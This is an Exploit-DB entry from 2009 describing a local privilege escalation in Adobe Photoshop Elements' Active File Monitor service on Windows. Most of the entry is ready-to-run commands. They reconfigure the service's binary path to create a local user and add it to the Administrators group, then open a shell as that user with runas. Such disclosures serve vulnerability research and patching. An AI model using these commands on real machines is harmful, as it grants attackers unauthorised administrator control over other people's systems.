Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation

EDB-ID:

9988


Author:

bellick

Type:

local


Platform:

Windows

Date:

2009-10-29


To exploit this issue, attackers require local, interactive access to an affected computer.

The following example commands are available:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd